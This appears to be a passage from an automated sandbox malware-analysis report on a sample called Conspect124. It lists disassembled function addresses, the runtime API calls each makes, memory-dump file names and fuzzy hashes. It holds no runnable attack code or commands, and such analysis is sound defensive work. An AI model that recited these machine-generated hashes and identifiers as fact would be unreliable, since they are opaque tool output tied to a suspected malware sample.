                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@$memset
                                      • String ID:
                                      • API String ID: 1860491036-0
                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                      Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                      • free.MSVCRT ref: 0040A908
                                      • free.MSVCRT ref: 0040A92B
                                      • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 726966127-0
                                      • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                      • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                      Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcslen.MSVCRT ref: 0040B1DE
                                      • free.MSVCRT ref: 0040B201
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                      • free.MSVCRT ref: 0040B224
                                      • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 726966127-0
                                      • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                      • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                      Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcmp$memcpy
                                      • String ID:
                                      • API String ID: 231171946-0
                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                      Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • strlen.MSVCRT ref: 0040B0D8
                                      • free.MSVCRT ref: 0040B0FB
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                      • free.MSVCRT ref: 0040B12C
                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$memcpy$mallocstrlen
                                      • String ID:
                                      • API String ID: 3669619086-0
                                      • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                      • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                      Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                      • malloc.MSVCRT ref: 00417407
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                      • free.MSVCRT ref: 00417425
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$freemalloc
                                      • String ID:
                                      • API String ID: 2605342592-0
                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                      Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcslen$wcscat$wcscpy
                                      • String ID:
                                      • API String ID: 1961120804-0
                                      • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                      • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E